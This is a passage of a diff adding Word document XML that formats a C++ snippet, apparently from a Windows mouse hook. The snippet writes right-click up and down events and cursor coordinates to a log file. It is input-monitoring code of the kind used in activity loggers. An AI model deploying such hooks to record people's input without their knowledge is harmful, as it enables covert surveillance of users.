+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>case</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>WM_RBUTTONUP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> result = "RIGHT CLICK UP. Mouse Coordinates: x = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(pMouseStruct-&gt;pt.x) + " | y = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(pMouseStruct-&gt;pt.y)+"\n";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fprintf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(MOUSE, "%s",result.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>c_str()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">case </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>WM_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>RBUTTONDOWN</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">string </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>result</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">= "RIGHT CLICK DOWN. Mouse Coordinates: x = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(pMouseStruct-&gt;pt.x) + " | y = " + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to_string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(pMouseStruct-&gt;pt.y)+"\n";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>fprintf(MOUSE, "%s",result</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.c_str()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>fclose</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(MOUSE);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
